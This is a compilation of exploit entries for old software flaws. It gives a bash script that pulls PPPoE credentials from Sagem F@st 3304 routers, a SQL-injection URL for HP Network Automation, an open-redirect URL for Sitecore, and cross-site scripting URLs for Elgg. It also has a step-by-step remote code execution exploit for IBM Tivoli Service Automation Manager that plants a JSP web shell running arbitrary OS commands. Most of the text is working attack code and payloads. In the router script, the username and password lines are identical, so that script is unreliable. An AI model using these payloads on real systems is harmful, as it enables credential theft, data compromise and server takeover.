Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information.
A remote attacker exploit this issue to obtain sensitive information, possibly aiding in further attacks.
#!/bin/bash
#########################################
# Exploit Title: Sagem 3304 Routers Get PPPOE Password
# Date 27/07/2011
# Author: securititracker@gmail.com
# Software Link: null
# Version: Sagem Routers F@st 3304
# Tested on: Sagem F@ST 3304
#
#########################################
Usage()
{
echo "Usage : $0 IP_ADDRESS"
}
if [ "$1" != "" ]
then
IP_ADDRESS="$1"
else
Usage
exit 1
fi
USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `
USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html -t 1 -q -O - | grep "msg051" | tr " " "\n" | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `
echo "Username = $USER_NAME ; Passsword = $USER_PASSWORD"
source: https://www.securityfocus.com/bid/48924/info
HP Network Automation is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, 9.10 are vulnerable.
http://www.example.com/view.php?id=1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11'
source: https://www.securityfocus.com/bid/48930/info
Sitecore CMS is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
Sitecore CMS versions 6.4.1 rev. 110324 and prior are vulnerable.
http://www.example.com/sitecore/shell/default.aspx?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=0
source: https://www.securityfocus.com/bid/48946/info
Curverider Elgg is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Curverider Elgg versions 1.7.9 and prior are vulnerable.
http://www.example.com/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f
http://www.example.com/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true
http://www.example.com/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22
http://www.example.com/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22
http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22
http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22
# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
# Date: 12\12\2014
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.ibm.com/
# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
# VU/CVE: VU#782708, CVE-2015-0104
1. Create report
2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:
POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
Host: site
Content-Length: xxx
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>
<%
try {
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");
if (request.getParameter("cmd") != null) {
cmd = new String (request.getParameter("cmd"));
if (OS.startsWith("Windows")) {
cmdarr = new String [] {"cmd", "/C", cmd};
}
else {
cmdarr = new String [] {"/bin/sh", "-c", cmd};
}
Process p = Runtime.getRuntime().exec(cmdarr);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
} catch (Exception e) { e.printStackTrace();}
%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
4. Web shell is now ready to use in path specified in __document parameter's value